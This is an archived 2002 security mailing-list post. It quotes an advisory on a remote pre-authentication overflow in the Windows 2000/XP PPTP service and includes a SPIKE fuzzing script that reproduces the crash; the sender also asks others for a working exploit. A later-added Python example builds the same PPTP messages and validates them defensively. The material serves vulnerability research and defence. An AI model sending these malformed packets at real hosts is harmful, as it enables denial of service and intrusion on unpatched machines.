From: Dave Aitel (dave_at_immunitysec.com)
Date: Thu Sep 26 2002 - 15:13:21 CDT


    SPIKE 2.6.2 or above should be able to handle this .spk file which will
    replicate the vulnerability. Someone send me a working sploit in
    exchange, please. I'm too lazy to muck with it. (Or I have other
    exploits to muck with, one or the other :>)

    -dave
    P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy)
    at http://www.immunitysec.com/spike.html, if you haven't already.
    P.P.S. This script is released under the terms of the GNU GPL v 2.0.

    On Thu, 2002-09-26 at 05:43, sh@phion.com wrote:
    > phion Security Advisory 26/09/2002
    >
    > Microsoft PPTP Server and Client remote vulnerability
    >
    >
    > Summary
    > -----------------------------
    >
    > The Microsoft PPTP Service shipping with Windows 2000 and XP contains a
    > remotely exploitable pre-authentication buffer overflow.
    >
    >
    > Affected Systems
    > -----------------------------
    >
    > Microsoft Windows 2000 and XP running either a PPTP Server or Client.
    >
    >
    > Impact
    > -----------------------------
    >
    > With a specially crafted PPTP packet it is possible to overwrite kernel
    > memory.
    >
    > A DoS resulting in a lockup of the machine has been verified on
    > Windows 2000 SP3 and Windows XP.
    >
    > A remote compromise should be possible deploying proper shellcode,
    > as we were able to fill EDI and EDX with our data.
    >
    > Clients are vulnerable too, because the Service always listens on port
    > 1723 on any interface of the machine; this might be of special concern
    > to DSL users who use PPTP to connect to their modem.
    >
    >
    > Solution
    > -----------------------------
    >
    > As a temporary solution for the Client issue, one might firewall the PPTP
    > port in the Internet Connection Firewall for Windows XP.
    >
    > We don't know of any solution for Windows 2000 and Windows XP PPTP servers.
    >
    > The vendor has been informed.
    >
    >
    > Acknowledgements
    > -----------------------------
    >
    > The bug has been discovered by Stephan Hoffmann and Thomas Unterleitner
    > on behalf of phion Information Technologies.
    >
    >
    > Contact Information
    > -----------------------------
    >
    > phion Information Technologies can be reached via:
    > office@phion.com / http://www.phion.com
    >
    > Stephan Hoffmann can be reached via:
    > sh@phion.com
    >
    > Thomas Unterleitner can be reached via:
    > t.unterleitner@phion.com
    >
    > References
    > -----------------------------
    >
    > [1] phion Information Technologies
    > http://www.phion.com/
    >
    > Exploit
    > -----------------------------
    >
    > phion Information Technologies will not provide an exploit for this issue.
    >
    >
    > Disclaimer
    > -----------------------------
    >
    > This advisory does not claim to be complete or to be usable for any
    > purpose.
    >
    > This advisory is free for open distribution in unmodified form.
    >
    > Articles or Publications that are based on information from this advisory
    > have to include link [1].
    >
    >

    //start control request
    s_block_start("PPTP");
    s_binary_block_size_halfword_bigendian("PPTP");
    //PPTP message type 1 - control message
    s_int_variable(0x0001,5);
    //cookie
    s_binary("1a 2b 3c 4d");
    //type 1 - start control request
    //5 is big endian halfword
    s_int_variable(0x0001,5);
    //reserved
    s_binary("0000");
    //version 1.0
    s_int_variable(0x0100,5);
    //reserved
    s_binary("0000");
    //Framing capabilities: 3 = asynchronous + synchronous framing
    s_binary("00000003");
    //Bearer capabilities: 2 = digital access
    s_binary("00000002");
    //maximum channels
    s_binary("ffff");
    //firmware revision
    s_int_variable(0x0001,5);

    //hostname
    s_string_variable("A");
    s_binary_repeat("00",63);

    //vendor
    s_string_variable("A");
    s_binary_repeat("00",63);

    s_block_end("PPTP");

    ///
    /// NEXT PACKET
    ///
    ///

    //start outgoing call request
    s_block_start("PPTP2");
    s_binary_block_size_halfword_bigendian("PPTP2");
    //PPTP message type 1 - control message
    s_int_variable(0x0001,5);

    //cookie
    s_binary("1a 2b 3c 4d");
    //type 7 - outgoing call request
    //5 is big endian halfword
    s_int_variable(0x0007,5);
    //reserved
    s_binary("0000");

    //call id
    s_binary("0000");

    //serial number
    s_binary("0000");

    //min bps
    s_binary("00000960");
    //max bps
    s_binary("00989680");
    //bearer capabilities
    s_binary("00000002");
    //framing
    s_binary("00000003");
    //receive window size
    s_binary("0003");
    //processing delay
    s_binary("0000");

    //phone number length (2 bytes) - filled in from the PHONENUMBER block below
    s_binary_block_size_halfword_bigendian("PHONENUMBER");
    //reserved
    s_binary("0000");
    //phone number (a 64-byte field on the wire; left variable so SPIKE fuzzes it)
    s_block_start("PHONENUMBER");
    s_string_variable("");
    s_block_end("PHONENUMBER");
    //subaddress (also a 64-byte field on the wire)
    s_string_variable("");
    s_block_end("PPTP2");

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQA9k2phB8JNm+PA+iURAqm7AJsE25Xs+qBtfAmxnXsdtIGt1oxm6gCg04iX
    alcRcjRAYoVrPGnYrPxPDxk=
    =3TKd
    -----END PGP SIGNATURE-----

    _______________________________________________
    Spike mailing list
    Spike@immunitysec.com
    http://www.immunitysec.com/mailman/listinfo/spike
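The two messages laid out in the SPIKE script above (a Start-Control-Connection-Request and an Outgoing-Call-Request, per RFC 2637) have fixed on-the-wire sizes, and every field offset depends on the leading length field and magic cookie being right. The Python below is an added example, not part of Dave's post, the phion advisory or the SPIKE project: it builds both messages with the same field values as the script and then runs them through a small validator of the kind a PPTP receiver or an IDS preprocessor should apply before trusting any field, rejecting truncated messages, a length field that disagrees with the bytes received, and a declared phone-number length larger than the 64-byte field. The messages are constructed here, not captured traffic, and the message-size constants are derived from the RFC field list, not from the page.

```python
import struct

# PPTP control-connection constants (RFC 2637); the same values appear in the
# SPIKE script above.
PPTP_MAGIC_COOKIE = 0x1A2B3C4D
MSG_TYPE_CONTROL = 1
CTRL_START_CONTROL_CONNECTION_REQUEST = 1
CTRL_OUTGOING_CALL_REQUEST = 7
# Fixed on-the-wire sizes, summed from the RFC 2637 field lists (assumption
# of this example, not stated on the page).
SCCRQ_LEN = 156
OCRQ_LEN = 168
PHONE_NUMBER_FIELD_LEN = 64


def build_sccrq(hostname=b"A", vendor=b"A"):
    """Well-formed Start-Control-Connection-Request with the same field values
    as the SPIKE 'PPTP' block (constructed sample, not captured traffic)."""
    body = struct.pack(
        ">HIHHHHIIHH",
        MSG_TYPE_CONTROL, PPTP_MAGIC_COOKIE, CTRL_START_CONTROL_CONNECTION_REQUEST,
        0,        # Reserved0
        0x0100,   # protocol version 1.0
        0,        # Reserved1
        3,        # framing capabilities: async + sync
        2,        # bearer capabilities: digital
        0xFFFF,   # maximum channels
        1,        # firmware revision
    )
    # Host Name and Vendor String are fixed 64-byte, NUL-padded fields.
    body += hostname.ljust(64, b"\x00")[:64] + vendor.ljust(64, b"\x00")[:64]
    return struct.pack(">H", 2 + len(body)) + body


def build_ocrq(phone_number=b"", subaddress=b"", phone_len=None):
    """Outgoing-Call-Request matching the SPIKE 'PPTP2' block. phone_len lets
    a caller construct a message whose declared phone-number length disagrees
    with the 64-byte field, the kind of inconsistency the validator rejects."""
    if phone_len is None:
        phone_len = len(phone_number)
    body = struct.pack(
        ">HIHHHHIIIIHHHH",
        MSG_TYPE_CONTROL, PPTP_MAGIC_COOKIE, CTRL_OUTGOING_CALL_REQUEST,
        0,           # Reserved0
        0,           # Call ID
        0,           # Call Serial Number
        0x960,       # minimum BPS (2400)
        0x989680,    # maximum BPS (10,000,000)
        2,           # bearer type: digital
        3,           # framing type
        3,           # packet receive window size
        0,           # packet processing delay
        phone_len,   # Phone Number Length
        0,           # Reserved1
    )
    body += phone_number.ljust(64, b"\x00")[:64] + subaddress.ljust(64, b"\x00")[:64]
    return struct.pack(">H", 2 + len(body)) + body


def check_pptp_control(msg):
    """Validate a PPTP control message before any field is trusted.
    Returns (ok, reason). Header sanity comes first because every later
    offset depends on the length field and the magic cookie."""
    if len(msg) < 10:
        return False, "short header"
    length, msg_type, cookie, ctrl = struct.unpack(">HHIH", msg[:10])
    if msg_type != MSG_TYPE_CONTROL:
        return False, "not a control message (type %d)" % msg_type
    if cookie != PPTP_MAGIC_COOKIE:
        return False, "bad magic cookie 0x%08x" % cookie
    if length != len(msg):
        return False, "length field %d != %d bytes received" % (length, len(msg))
    if ctrl == CTRL_START_CONTROL_CONNECTION_REQUEST:
        if length != SCCRQ_LEN:
            return False, "SCCRQ must be %d bytes, got %d" % (SCCRQ_LEN, length)
        return True, "SCCRQ ok"
    if ctrl == CTRL_OUTGOING_CALL_REQUEST:
        if length != OCRQ_LEN:
            return False, "OCRQ must be %d bytes, got %d" % (OCRQ_LEN, length)
        # Phone Number Length sits at offset 36, just before Reserved1.
        phone_len = struct.unpack(">H", msg[36:38])[0]
        if phone_len > PHONE_NUMBER_FIELD_LEN:
            return False, "phone number length %d exceeds %d-byte field" % (
                phone_len, PHONE_NUMBER_FIELD_LEN)
        return True, "OCRQ ok"
    return False, "unhandled control message type %d" % ctrl


if __name__ == "__main__":
    samples = [
        ("well-formed SCCRQ", build_sccrq()),
        ("well-formed OCRQ", build_ocrq(b"5551212")),
        ("truncated SCCRQ", build_sccrq()[:100]),
        ("OCRQ with oversized phone length", build_ocrq(b"", phone_len=0xFFFF)),
    ]
    for label, msg in samples:
        print("%-34s -> %s" % (label, check_pptp_control(msg)))
```

The validator deliberately checks the length field against the bytes actually received rather than against the declared value alone; a receiver that indexes into the message using declared lengths before that comparison is exactly the pattern that turns a malformed control packet into a memory-safety problem.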